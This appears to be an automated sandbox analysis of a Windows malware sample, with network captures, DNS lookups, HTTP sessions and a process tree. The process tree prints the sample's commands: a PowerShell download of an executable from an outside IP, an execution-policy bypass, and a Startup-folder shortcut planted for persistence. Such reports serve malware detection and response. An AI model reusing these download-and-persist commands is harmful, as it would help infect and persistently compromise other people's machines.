                                                          Jan 2, 2025 10:55:01.428117990 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428126097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428133965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428147078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428153992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428164005 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428174973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428320885 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428440094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428448915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428458929 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.428487062 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428525925 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435540915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435600996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435610056 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435635090 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435657024 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435667038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435709953 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435739040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435746908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435786963 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.435961008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435970068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435978889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435987949 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.435997009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436005116 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436007023 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436013937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436022997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436033010 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436037064 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436062098 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436078072 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436187029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436197042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436239004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436296940 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436306953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436315060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436322927 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436331987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436341047 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436508894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436517954 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436526060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436534882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436542034 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436543941 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436559916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436585903 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436691999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436702013 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436711073 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436719894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436728001 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436737061 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.436738014 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436774015 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.436789989 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512037992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512236118 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512249947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512259960 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512274027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512301922 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512310028 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512320042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512329102 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512403011 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512413025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512422085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512430906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512430906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512442112 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512474060 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512474060 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512485027 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512645006 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512655973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512664080 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512672901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512682915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512696028 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512723923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512777090 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512821913 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512883902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512892962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512901068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512909889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512917995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512928009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512931108 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512942076 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.512959003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.512986898 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513164997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513174057 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513187885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513195992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513204098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513210058 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513214111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513222933 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513231039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513233900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513241053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513271093 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513293028 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513552904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513561964 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513570070 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513577938 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513586998 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513614893 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513629913 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513700008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513709068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513719082 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513742924 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513763905 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513883114 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513890982 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513899088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513909101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513916969 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513923883 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513926029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513935089 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513945103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.513957977 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513978958 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.513988018 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.514182091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514189959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514199018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514206886 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.514215946 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686497927 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686508894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686518908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686531067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686538935 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686549902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686554909 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686575890 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686753988 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686763048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686772108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686775923 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686789989 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686790943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686800003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686809063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686817884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686817884 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686863899 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687030077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687076092 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687103987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687115908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687124014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687131882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687141895 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687153101 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687190056 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687323093 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687335014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687342882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687352896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687362909 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687367916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687371969 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687381983 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687406063 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687434912 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.928092003 CET4970580192.168.2.5139.99.188.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 10:55:04.763775110 CET | 59108 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 10:55:04.774643898 CET | 53 | 59108 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 10:55:22.367465019 CET | 53983 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 10:55:22.376018047 CET | 53 | 53983 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 10:55:04.763775110 CET | 192.168.2.5 | 1.1.1.1 | 0xb5b8 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Jan 2, 2025 10:55:22.367465019 CET | 192.168.2.5 | 1.1.1.1 | 0xead1 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 10:55:04.774643898 CET | 1.1.1.1 | 192.168.2.5 | 0xb5b8 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 10:55:22.376018047 CET | 1.1.1.1 | 192.168.2.5 | 0xead1 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
                                                          • 139.99.188.124
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 139.99.188.124 | 80 | 3752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 10:54:55.946582079 CET | 167 | OUT | GET /TSKUVpnJ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 139.99.188.124
Connection: Keep-Alive
Jan 2, 2025 10:54:56.815186977 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Thu, 02 Jan 2025 09:54:56 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Mon, 16 Dec 2024 15:40:22 GMT
                                                          ETag: "da2a8-62964ffa303b5"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 893608
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 139.99.188.124 | 80 | 940 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 10:54:59.105448961 CET | 73 | OUT | GET /kYCQj.txt HTTP/1.1
Host: 139.99.188.124
Connection: Keep-Alive
Jan 2, 2025 10:54:59.965117931 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Thu, 02 Jan 2025 09:54:59 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Mon, 16 Dec 2024 15:40:22 GMT
                                                          ETag: "1301c2-62964ffa2f293"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1245634
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/plain



                                                          Target ID:0
                                                          Start time:04:54:51
                                                          Start date:02/01/2025
                                                          Path:C:\Users\user\Desktop\cxZuGa.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\cxZuGa.exe"
                                                          Imagebase:0x7ff7ec120000
                                                          File size:1'083'904 bytes
                                                          MD5 hash:243E64FA2B25BBA3E6C710DE1BDD4B0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:04:54:52
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:04:54:52
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:04:54:57
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:04:54:57
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:04:55:00
                                                          Start date:02/01/2025
                                                          Path:C:\Users\Public\Guard.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                          Imagebase:0xc30000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:04:55:03
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:04:55:03
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:04:55:15
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                          Imagebase:0x7ff612dd0000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:04:55:15
                                                          Start date:02/01/2025
                                                          Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                          Imagebase:0x5f0000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10.9%
                                                            Total number of Nodes:1427
                                                            Total number of Limit Nodes:41
94045->94115 94052 7ff7ec1674f8 GetLastError 94046->94052 94053 7ff7ec167549 94046->94053 94050 7ff7ec1674b8 GetLastError 94047->94050 94055 7ff7ec167478 CreateFileW 94047->94055 94117 7ff7ec155564 15 API calls 2 library calls 94050->94117 94051 7ff7ec166d95 94051->94032 94080 7ff7ec15e3f4 LeaveCriticalSection 94051->94080 94118 7ff7ec155564 15 API calls 2 library calls 94052->94118 94120 7ff7ec15e334 16 API calls 2 library calls 94053->94120 94054 7ff7ec1673e4 94116 7ff7ec1555d4 15 API calls _set_fmode 94054->94116 94055->94046 94055->94050 94059 7ff7ec167507 CloseHandle 94059->94042 94061 7ff7ec167539 94059->94061 94119 7ff7ec1555d4 15 API calls _set_fmode 94061->94119 94062 7ff7ec167568 94064 7ff7ec1675b5 94062->94064 94121 7ff7ec167284 67 API calls 2 library calls 94062->94121 94069 7ff7ec1675ec 94064->94069 94122 7ff7ec166de4 67 API calls 4 library calls 94064->94122 94065 7ff7ec16753e 94065->94042 94068 7ff7ec1675e8 94068->94069 94070 7ff7ec1675fe 94068->94070 94123 7ff7ec1604b8 94069->94123 94070->94051 94072 7ff7ec167681 CloseHandle CreateFileW 94070->94072 94073 7ff7ec1676cb GetLastError 94072->94073 94074 7ff7ec1676f9 94072->94074 94138 7ff7ec155564 15 API calls 2 library calls 94073->94138 94074->94051 94076 7ff7ec1676d8 94139 7ff7ec15e548 16 API calls 2 library calls 94076->94139 94078->94028 94079->94032 94082 7ff7ec1670a4 94081->94082 94090 7ff7ec1670be 94081->94090 94083 7ff7ec1555d4 _set_fmode 15 API calls 94082->94083 94082->94090 94084 7ff7ec1670b3 94083->94084 94085 7ff7ec15b164 _invalid_parameter_noinfo 31 API calls 94084->94085 94085->94090 94086 7ff7ec16718c 94088 7ff7ec152554 31 API calls 94086->94088 94098 7ff7ec1671ec 94086->94098 94087 7ff7ec16713b 94087->94086 94089 7ff7ec1555d4 _set_fmode 15 API calls 94087->94089 94091 7ff7ec1671e8 94088->94091 94092 7ff7ec167181 94089->94092 94090->94087 94093 7ff7ec1555d4 _set_fmode 15 API calls 94090->94093 94096 7ff7ec16726b 94091->94096 94091->94098 94094 7ff7ec15b164 _invalid_parameter_noinfo 31 
API calls 94092->94094 94095 7ff7ec167130 94093->94095 94094->94086 94097 7ff7ec15b164 _invalid_parameter_noinfo 31 API calls 94095->94097 94099 7ff7ec15b184 _invalid_parameter_noinfo 16 API calls 94096->94099 94097->94087 94098->94038 94098->94039 94100 7ff7ec167280 94099->94100 94102 7ff7ec15b9bc _isindst EnterCriticalSection 94101->94102 94108 7ff7ec15e43b 94102->94108 94103 7ff7ec15e464 94105 7ff7ec15e170 16 API calls 94103->94105 94104 7ff7ec15ba10 _isindst LeaveCriticalSection 94106 7ff7ec15e52a 94104->94106 94107 7ff7ec15e469 94105->94107 94106->94044 94106->94045 94110 7ff7ec15e310 wprintf EnterCriticalSection 94107->94110 94111 7ff7ec15e487 94107->94111 94108->94103 94109 7ff7ec15e4c2 EnterCriticalSection 94108->94109 94108->94111 94109->94111 94112 7ff7ec15e4d1 LeaveCriticalSection 94109->94112 94110->94111 94111->94104 94112->94108 94113->94042 94114->94051 94115->94054 94116->94042 94117->94042 94118->94059 94119->94065 94120->94062 94121->94064 94122->94068 94124 7ff7ec15e604 31 API calls 94123->94124 94126 7ff7ec1604cc 94124->94126 94125 7ff7ec1604d2 94128 7ff7ec15e548 16 API calls 94125->94128 94126->94125 94127 7ff7ec16050c 94126->94127 94129 7ff7ec15e604 31 API calls 94126->94129 94127->94125 94130 7ff7ec15e604 31 API calls 94127->94130 94131 7ff7ec160534 94128->94131 94133 7ff7ec1604ff 94129->94133 94134 7ff7ec160518 CloseHandle 94130->94134 94132 7ff7ec160560 94131->94132 94135 7ff7ec155564 fread_s 15 API calls 94131->94135 94132->94051 94136 7ff7ec15e604 31 API calls 94133->94136 94134->94125 94137 7ff7ec160525 GetLastError 94134->94137 94135->94132 94136->94127 94137->94125 94138->94076 94139->94074 